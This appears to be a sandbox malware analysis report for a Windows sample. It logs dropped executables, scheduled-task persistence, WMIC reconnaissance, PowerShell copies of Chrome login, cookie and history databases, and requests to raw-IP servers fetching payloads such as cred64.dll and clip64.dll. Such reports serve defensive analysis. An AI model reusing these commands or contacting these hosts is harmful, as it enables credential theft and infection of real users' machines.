Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | March 30, 2023, 4:27 p.m. | March 30, 2023, 4:33 p.m. |
-
-
-
-
-
tz9648.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\tz9648.exe
2312 -
v7412DB.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\v7412DB.exe
2756
-
-
w78XP44.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\w78XP44.exe
2804
-
-
xnmXr68.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\xnmXr68.exe
2856
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
2120 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit
2512-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2784 -
cacls.exe CACLS "oneetx.exe" /P "test22:N"
2840 -
cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
2216 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2412 -
cacls.exe CACLS "..\c5d2db5804" /P "test22:N"
2720 -
cacls.exe CACLS "..\c5d2db5804" /P "test22:R" /E
3016
-
-
123dsss.exe "C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe"
2904 -
-
Tarlatan.exe C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe
2484
-
-
Gmeyad.exe "C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe"
2876 -
-
-
WMIC.exe wmic csproduct get uuid
2264
-
-
WMIC.exe wmic os get Caption
184 -
-
WMIC.exe wmic path win32_VideoController get name
288
-
-
-
WMIC.exe wmic cpu get name
1780
-
-
-
systeminfo.exe systeminfo
2992
-
-
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\test22\AppData\Local\Temp\XVlBzgbaiC\""
3140 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies\" \"C:\Users\test22\AppData\Local\Temp\MRAjWwhTHc\""
3300 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\tcuAxhxKQFDaFpL\""
3404 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\test22\AppData\Local\Temp\SjFbcXoEFf\""
3508 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\RsWxPLDnJObCsNV\""
3608 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\test22\AppData\Local\Temp\lgTeMaPEZQ\""
3704 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\leQYhYzRyWJjPjz\""
3800 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\test22\AppData\Local\Temp\pfRFEgmota\""
3896 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\FetHsbZRjxAwnwe\""
3992 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\krBEmfdzdc\""
4088 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\EkXBAkjQZLCtTMt\""
2504 -
powershell.exe powershell "" "copy \"C:\Users\test22\AppData\Local\Microsoft\Windows\History\" \"C:\Users\test22\AppData\Local\Temp\TCoaNatyyi\""
1480
-
-
w.exe "C:\Users\test22\AppData\Local\Temp\1000012001\w.exe"
1684 -
tmpBEB8.exe "C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe"
3032 -
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
3356
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
Name | Response | Post-Analysis Lookup |
---|---|---|
bitcoin.org | 172.67.40.154 | |
download.electrum.org | 104.21.89.144 | |
downloads.exodus.com | 104.18.18.218 |
IP Address | Status | Action |
---|---|---|
104.18.19.218 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.160.221 | Active | Moloch |
172.67.40.154 | Active | Moloch |
176.113.115.145 | Active | Moloch |
185.246.221.126 | Active | Moloch |
193.233.20.36 | Active | Moloch |
199.115.193.116 | Active | Moloch |
212.87.204.93 | Active | Moloch |
66.42.108.195 | Active | Moloch |
45.33.6.223 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49199 172.67.160.221:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.electrum.org | 76:1b:7b:1a:b2:a7:3f:c5:99:a7:2b:68:f5:fd:1b:a5:5e:97:4b:65 |
TLSv1 192.168.56.103:49194 172.67.40.154:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=*.bitcoin.org | 1a:81:c6:0e:51:52:81:af:8a:1f:a8:fe:a3:18:04:fa:db:01:f5:3c |
pdb_path | wextract.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
resource name | AVI |
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://193.233.20.36/joomla/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.36/lend/123dsss.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.36/lend/Tarlatan.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.36/lend/Gmeyad.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.246.221.126/bins/2023.exe.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.246.221.126/bins/w.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.36/lend/tmpBEB8.tmp.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.36/joomla/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.233.20.36/joomla/Plugins/clip64.dll |
request | POST http://193.233.20.36/joomla/index.php |
request | GET http://193.233.20.36/lend/123dsss.exe |
request | GET http://193.233.20.36/lend/Tarlatan.exe |
request | GET http://193.233.20.36/lend/Gmeyad.exe |
request | GET http://185.246.221.126/bins/2023.exe.exe |
request | GET http://185.246.221.126/bins/w.exe |
request | GET http://193.233.20.36/lend/tmpBEB8.tmp.exe |
request | GET http://193.233.20.36/joomla/Plugins/cred64.dll |
request | GET http://193.233.20.36/joomla/Plugins/clip64.dll |
request | GET https://bitcoin.org/bin/bitcoin-core-22.0/bitcoin-22.0-win64-setup.exe |
request | GET https://download.electrum.org/4.3.4/electrum-4.3.4-setup.exe |
request | POST http://193.233.20.36/joomla/index.php |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\101.3.34.11\manifest.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\LOG |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2391.0\manifest.fingerprint |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\1.0.6.0\preloaded_data.pb |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\is |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\a4b90990b418581487bb13a2cc67700a3c359804f91bdfb8e377cd0ec80ddc10.sth |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\is\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\iw |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\it |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\de |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\id |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\c652a0ec48ceb3fcab170992c43a87413309e80065a26252401ba3362a17c565.sth |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fi\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\0.57.44.2492\_platform_specific\x86_64\pnacl_public_pnacl_json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2209.0\_platform_specific |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\es_419\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\5ea773f9df56c0e7b536487dd049e0327a919a0c84a112128418759681714558.sth |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\el\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\ja |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOCK |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\fil |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\ro\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\ca |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\el\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\tr\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\cs |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_PT\messages.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\computed_hashes.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\7\manifest.fingerprint |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2209.0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_metadata\computed_hashes.json |
file | C:\Users\test22\AppData\Roaming\exodus-windows-x64-23.3.27.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\zap9306.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\zap6859.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\xnmXr68.exe |
file | C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\v7412DB.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\w78XP44.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\tz9648.exe |
file | C:\Users\test22\AppData\Local\Temp\1000012001\w.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\zap5462.exe |
file | C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe |
file | C:\Users\test22\AppData\Roaming\electrum-4.3.4-setup.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y53BD64.exe |
file | C:\Users\test22\AppData\Local\Temp\Updater.exe |
file | C:\Users\test22\AppData\Roaming\bitcoin-22.0-win64-setup.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroAI_Click.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click_image.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\msi2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\My Documents.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test_doc.eml.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\office_2007.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exe1.zip.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test.eml.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\robot.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\╗τ┐δ╣².txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.py.lnk |
file | C:\Users\test22\AppData\Local\Temp\c5d2db5804\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox Guest Additions\Website.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ok1.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\sn.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\test (1).eml.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMSAuto_Net_2015_v1.4. 2.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\docx2.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Database1.accdb.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\한글2010(정품).lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\KMS Activation.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Outlook.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.py.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\SendTo\EditPlus.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\readme.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\시리얼넘버.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\ZeroCERT.bmp.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Microsoft\Windows\History\" \"C:\Users\test22\AppData\Local\Temp\TCoaNatyyi\"" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\test22\AppData\Local\Temp\SjFbcXoEFf\"" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\RsWxPLDnJObCsNV\"" |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c5d2db5804" /P "test22:N"&&CACLS "..\c5d2db5804" /P "test22:R" /E&&Exit |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\leQYhYzRyWJjPjz\"" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies\" \"C:\Users\test22\AppData\Local\Temp\MRAjWwhTHc\"" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\tcuAxhxKQFDaFpL\"" |
cmdline | cmd.exe /c "wmic csproduct get uuid" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\test22\AppData\Local\Temp\lgTeMaPEZQ\"" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\test22\AppData\Local\Temp\pfRFEgmota\"" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\FetHsbZRjxAwnwe\"" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F |
cmdline | wmic path win32_VideoController get name |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\EkXBAkjQZLCtTMt\"" |
cmdline | wmic os get Caption |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | wmic csproduct get uuid |
cmdline | cmd /C "wmic path win32_VideoController get name" |
cmdline | wmic cpu get name |
cmdline | cmd /C "wmic cpu get name" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Roaming\Microsoft\Windows\Cookies\" \"C:\Users\test22\AppData\Local\Temp\XVlBzgbaiC\"" |
cmdline | powershell "" "copy \"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\test22\AppData\Local\Temp\krBEmfdzdc\"" |
file | C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe |
file | C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe |
file | C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe |
file | C:\Users\test22\AppData\Local\Temp\1000012001\w.exe |
file | C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe |
file | C:\Users\test22\AppData\Local\Temp\1000012001\w.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\123dsss.exe |
file | C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe |
file | C:\Users\test22\AppData\Local\Temp\1000011001\2023.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000004001\Tarlatan.exe |
file | C:\Users\test22\AppData\Local\Temp\1000007001\Gmeyad.exe |
file | C:\Users\test22\AppData\Local\Temp\1000017001\tmpBEB8.exe |